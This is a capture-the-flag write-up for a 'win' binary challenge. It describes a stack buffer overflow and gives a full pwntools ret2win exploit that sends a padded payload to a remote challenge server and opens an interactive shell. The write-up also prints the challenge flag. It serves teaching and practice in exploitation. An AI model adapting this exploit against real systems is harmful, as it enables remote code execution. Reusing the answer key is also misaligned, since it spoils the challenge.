win... win... window...!

Challenge Description :

Basic File Enumeration :

this is a 64 bit binary not stripped and we have onlu NX Protection enabled which makes the stack not executable the thing that makes shellcode won't be executable

opening the binary in ghidra we find 2 interesting functions

the main function which is vulnerable to BOF

and the shell function which executes the bash so our goal to return to this function

first we need to know the offset to the EIP

Offset to RIP :

so the offset to RIP is 18

Exploit :

from pwn import *

# Set up pwntools for the correct architecture
exe = './win'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'debug'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# io = process(exe)
io = remote('173.255.201.51', 3337)
offset = 18
ret = 0x40101a #ret gadget (ropper --file=win --search="ret") 
payload = flat(
	offset * b'A',
    ret, # stack alignement
	elf.functions.shell
)

io.sendline(payload)

io.interactive()

Flag :

KCTF{r3T_7o_W1n_iS_V3rRY_3AsY}

Previous The Dragon's Secret Scroll NextCyber Apocalypse 2024: Hacker Royale

Last updated 1 year ago

Was this helpful?